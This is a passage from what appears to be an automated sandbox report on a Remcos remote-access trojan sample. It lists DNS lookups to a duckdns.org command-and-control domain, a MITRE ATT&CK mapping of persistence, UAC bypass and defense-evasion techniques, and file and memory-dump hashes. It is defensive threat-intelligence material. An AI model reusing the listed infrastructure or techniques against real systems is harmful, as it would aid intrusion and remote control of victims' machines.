    70 B
     144 B
     1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    a458386d9.duckdns.org
    dns
    msiexec.exe
    134 B
     150 B
     2
    2

    DNS Request

    a458386d9.duckdns.org

    DNS Request

    a458386d9.duckdns.org

    DNS Response

    192.169.69.26

  • 8.8.8.8:53
    26.69.169.192.in-addr.arpa
    dns
    72 B
     103 B
     1
    1

    DNS Request

    26.69.169.192.in-addr.arpa

  • 8.8.8.8:53
    180.129.81.91.in-addr.arpa
    dns
    72 B
     147 B
     1
    1

    DNS Request

    180.129.81.91.in-addr.arpa

  • 8.8.8.8:53
    31.243.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    31.243.111.52.in-addr.arpa

  • 8.8.8.8:53
    a458386d9.duckdns.org
    dns
    msiexec.exe
    67 B
     83 B
     1
    1

    DNS Request

    a458386d9.duckdns.org

    DNS Response

    192.169.69.26

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Impair Defenses

1
T1562

Disable or Modify Tools

1
T1562.001

Modify Registry

3
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1
T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    8f325b4591d8ab596342c958c8f79a4d

    SHA1

    be25bd93ad867ec17a908deddb8fe2ad8bc4323f

    SHA256

    94d62bbfd49151981acc0b4e859fb1771fb5024d3805ca1cb3f8b5e0c620843d

    SHA512

    a64ff0bb576f1621df7ec4cb270e891849051ec327af486ae4e454addc36f72fc26a43f32820d733d99b0512bea0c3535dc1f0fd02a7999b57068ee71569be3c

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    d4ff23c124ae23955d34ae2a7306099a

    SHA1

    b814e3331a09a27acfcd114d0c8fcb07957940a3

    SHA256

    1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

    SHA512

    f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q4yl3nq0.ymp.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Inflicts.Kol
    Filesize

    451KB

    MD5

    a0ead43a9e0373f5a840cf296b8b62ba

    SHA1

    e4a16dcdd161437d6aa66b5f2e8a8f2350f83c07

    SHA256

    e1171748791ea73409433b75b28fd35fcd327d76e909eed3bfcd033c1e6e1982

    SHA512

    5371b93899ffa12cbc5e5f99a03a3ac39eef2fce77030e3998efa88f71d907184476ee36aa3b4c0808a58138a323bb0a0cb9bb1380c4dc1ef1eb704f30f4d8ff

    Download Submit

  • memory/624-46-0x0000000007190000-0x00000000071B2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/624-45-0x0000000007230000-0x00000000072C6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/624-49-0x00000000089F0000-0x000000000BEE3000-memory.dmp

    Filesize

    52.9MB

    Download

  • memory/624-47-0x0000000008440000-0x00000000089E4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/624-44-0x0000000006510000-0x000000000652A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/624-25-0x00000000049D0000-0x0000000004A06000-memory.dmp

    Filesize

    216KB

    Download

  • memory/624-26-0x0000000005040000-0x0000000005668000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/624-27-0x00000000056E0000-0x0000000005702000-memory.dmp

    Filesize

    136KB

    Download

  • memory/624-28-0x0000000005780000-0x00000000057E6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/624-29-0x0000000005860000-0x00000000058C6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/624-39-0x0000000005990000-0x0000000005CE4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/624-43-0x0000000007810000-0x0000000007E8A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/624-41-0x0000000005F80000-0x0000000005F9E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/624-42-0x0000000005FC0000-0x000000000600C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1620-62-0x0000000001000000-0x0000000002254000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1620-63-0x0000000001000000-0x0000000002254000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2892-16-0x00007FFF14D30000-0x00007FFF157F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2892-24-0x00007FFF14D30000-0x00007FFF157F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2892-18-0x00007FFF14D33000-0x00007FFF14D35000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2892-4-0x00007FFF14D33000-0x00007FFF14D35000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2892-21-0x00007FFF14D30000-0x00007FFF157F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2892-15-0x00007FFF14D30000-0x00007FFF157F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2892-20-0x00007FFF14D30000-0x00007FFF157F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2892-10-0x0000027684EC0000-0x0000027684EE2000-memory.dmp

    Filesize

    136KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.